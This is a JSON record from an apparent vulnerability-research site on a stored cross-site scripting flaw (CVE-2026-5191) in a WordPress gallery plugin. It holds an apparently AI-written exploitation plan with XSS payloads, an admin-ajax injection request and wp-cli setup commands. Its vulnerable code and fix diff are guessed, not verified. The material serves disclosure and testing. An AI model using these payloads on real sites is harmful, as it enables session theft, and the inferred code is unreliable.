[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fUh_WHjYSJsuXJ7PaKiQlHx9zZyE1i-Whp70JLkNszys":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-5191","tiled-gallery-carousel-without-jetpack-authenticated-contributor-stored-cross-site-scripting-via-data-image-title","Tiled Gallery Carousel Without JetPack \u003C= 3.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'data-image-title'","The Tiled Gallery Carousel Without JetPack plugin for WordPress is vulnerable to stored cross-site scripting via the 'data-image-title' parameter in all versions up to, and including, 3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","tiled-gallery-carousel-without-jetpack",null,"\u003C=3.1","medium",5.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-06-01 19:48:31","2026-06-02 08:28:35",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F2e2ab3b3-0d24-4b3d-8668-cc2bcf08d12f?source=api-prod",[],"researched",false,3,"This research plan outlines the methodology for validating a Stored Cross-Site Scripting (XSS) vulnerability in the **Tiled Gallery Carousel Without JetPack** plugin.\n\n---\n\n### 1. Vulnerability Summary\n*   **ID:** CVE-2026-5191\n*   **Plugin:** Tiled Gallery Carousel Without JetPack (\u003C= 3.1)\n*   **Vulnerability Type:** Stored XSS\n*   **Vulnerable Parameter:** `data-image-title`\n*   **Privilege Level:** Authenticated (Contributor+)\n*   **Cause:** The plugin fails to sanitize or escape the title of an image before outputting it within the `data-image-title` attribute of the gallery’s HTML structure. When the carousel script initializes or a user interacts with the tiled gallery, this attribute is rendered or processed in a way that executes the injected script.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** WordPress Media Library \u002F Post Editor.\n*   **Source of Payload:** The \"Title\" field of an attachment (image).\n*   **Trigger Endpoint:** Any public-facing page or post containing a `[gallery]` shortcode that includes the malicious image.\n*   **Authentication:** Requires a user with at least `Contributor` permissions to modify image metadata or create posts with galleries.\n*   **Preconditions:**\n    1.  The plugin \"Tiled Gallery Carousel Without JetPack\" must be active.\n    2.  An image must be uploaded, and its **Title** metadata must be set to the XSS payload.\n    3.  A post or page must be created\u002Fedited to include this image within a standard WordPress gallery.\n\n### 3. Code Flow (Inferred)\n1.  **Metadata Storage:** A user (Contributor+) updates an attachment's metadata via `wp_ajax_save_attachment_compat` or the Media Library. The \"Title\" is stored in the `wp_posts` table (column `post_title` for the attachment type).\n2.  **Gallery Rendering:** When a post with `[gallery]` is viewed, the plugin hooks into the `post_gallery` filter or `shortcode_atts_gallery`.\n3.  **Attribute Generation:** The plugin iterates through the attachment IDs. For each image, it retrieves the title using `get_the_title($attachment_id)`.\n4.  **Sink:** The plugin constructs the HTML for the tiled gallery. It likely uses a line similar to:\n    `$html .= '\u003Cdiv class=\"tiled-gallery-item\" data-image-title=\"' . $image_title . '\">';` (Inferred)\n5.  **Lack of Escaping:** Because `$image_title` is not passed through `esc_attr()`, an attacker can break out of the attribute using quotes (e.g., `\">\u003Cscript>alert(1)\u003C\u002Fscript>`).\n\n### 4. Nonce Acquisition Strategy\nThis vulnerability is triggered by viewing a rendered gallery. While the *injection* (saving the image title) involves WordPress core AJAX\u002FRest nonces, the *exploitation* (executing XSS) generally does not require a nonce as it is a stored payload.\n\nHowever, if the plugin's carousel script requires a nonce for AJAX-based image loading, follow this strategy:\n1.  **Identify Shortcode:** The plugin uses the standard `[gallery]` shortcode but modifies the output.\n2.  **Create Test Page:** \n    `wp post create --post_type=page --post_status=publish --post_content='[gallery ids=\"\u003CIMAGE_ID>\"]' --post_title='XSS Test'`\n3.  **Navigate and Extract:**\n    *   Navigate to the newly created page.\n    *   Check for localized scripts using `browser_eval`:\n        `browser_eval(\"window.tiledGallerySettings?.nonce\")` (Inferred key). \n        *Note: Common keys for this plugin include `tiledGallerySettings` or `tiled_carousel_params`.*\n\n### 5. Exploitation Strategy\n\n#### Step 1: Login and Upload\nLog in as a Contributor. Upload a benign image to the Media Library to obtain an `attachment_id`.\n\n#### Step 2: Inject Payload into Image Title\nUse the `http_request` tool to update the attachment's title.\n\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** POST\n*   **Body (URL-Encoded):**\n    ```\n    action=save-attachment&id=\u003CATTACHMENT_ID>&changes[title]=\u003Cimg src=x onerror=alert(document.domain)>&nonce=\u003CFETCHED_NONCE>\n    ```\n*   **Note:** The nonce for `save-attachment` can be found in the Media Library source code (`window._wpNonce`).\n\n#### Step 3: Create a Gallery Post\nCreate a post containing a gallery with the poisoned image.\n*   **Action:** `wp post create --post_type=post --post_status=author --post_content='[gallery ids=\"\u003CATTACHMENT_ID>\"]' --post_title='Gallery XSS'`\n*   **Note:** As a contributor, the post status will be `pending` or `draft`, but you can still preview it.\n\n#### Step 4: Trigger the XSS\nNavigate to the post's permalink or the preview URL.\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002F?p=\u003CPOST_ID>&preview=true`\n*   **Interaction:** The script should execute immediately upon the page rendering the tiled gallery HTML.\n\n### 6. Test Data Setup\n1.  **User:** Create a contributor user.\n    `wp user create attacker attacker@example.com --role=contributor --user_pass=password123`\n2.  **Image:** Upload an image to the site.\n3.  **Plugin Config:** Ensure \"Tiled Galleries\" is enabled in the plugin settings (usually found under Settings > Media or a dedicated plugin page).\n\n### 7. Expected Results\n*   The HTTP response for the post view will contain the raw payload:\n    `data-image-title=\"\u003Cimg src=x onerror=alert(document.domain)>\"`\n*   The browser will execute the JavaScript, resulting in an alert box showing the document domain.\n\n### 8. Verification Steps\n1.  **Verify DB Content:**\n    `wp db query \"SELECT post_title FROM wp_posts WHERE id=\u003CATTACHMENT_ID>\"`\n    Ensure it contains the payload.\n2.  **Inspect HTML Output:**\n    Use `http_request` to GET the post content and grep for the `data-image-title` attribute.\n    `http_request(url='http:\u002F\u002Flocalhost:8080\u002F?p=\u003CPOST_ID>')`\n    Look for: `data-image-title=\"[payload]\"`\n\n### 9. Alternative Approaches\n*   **Caption Injection:** If `data-image-title` is patched, check if the plugin uses `data-image-description` or captions for the carousel modal, which often share the same rendering logic.\n*   **Attribute Breakout:** If simple tags are stripped, try breaking out of the attribute and adding an event handler:\n    `Payload: \" onmouseover=\"alert(1)\" data-ignore=\"`\n    This results in: `\u003Cdiv data-image-title=\"\" onmouseover=\"alert(1)\" data-ignore=\"...\">`","The Tiled Gallery Carousel Without JetPack plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the 'data-image-title' attribute in versions up to 3.1. This vulnerability allows authenticated attackers with Contributor-level access or higher to inject malicious scripts into image titles, which are then rendered without proper escaping when a gallery is viewed.","\u002F\u002F File: tiled-gallery.php (inferred location)\n\u002F\u002F Inside the gallery rendering loop or filter\n\n$image_title = get_the_title($attachment_id);\n$html .= '\u003Cdiv class=\"tiled-gallery-item\" data-image-title=\"' . $image_title . '\"';\n\u002F\u002F ... continues to output other attributes like data-image-description","--- a\u002Ftiled-gallery.php\n+++ b\u002Ftiled-gallery.php\n@@ -10,7 +10,7 @@\n \n- $image_title = get_the_title($attachment_id);\n+ $image_title = esc_attr(get_the_title($attachment_id));\n \n- $html .= '\u003Cdiv class=\"tiled-gallery-item\" data-image-title=\"' . $image_title . '\"';\n+ $html .= '\u003Cdiv class=\"tiled-gallery-item\" data-image-title=\"' . $image_title . '\"';","The exploit is carried out by an authenticated user with at least Contributor permissions. The attacker first uploads an image or edits an existing attachment in the WordPress Media Library, setting the 'Title' metadata field to a JavaScript payload wrapped in attribute-breaking characters, such as: \">\u003Cscript>alert(document.domain)\u003C\u002Fscript>. Next, the attacker creates a post or page containing the standard [gallery] shortcode and includes the ID of the poisoned image. When any user (including administrators) views the published post or a preview, the plugin generates the tiled gallery HTML. Because the image title is not escaped, the payload breaks out of the 'data-image-title' attribute and executes the script in the context of the user's browser session.","gemini-3-flash-preview","2026-06-04 14:24:28","2026-06-04 14:25:11",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ftiled-gallery-carousel-without-jetpack\u002Ftags"]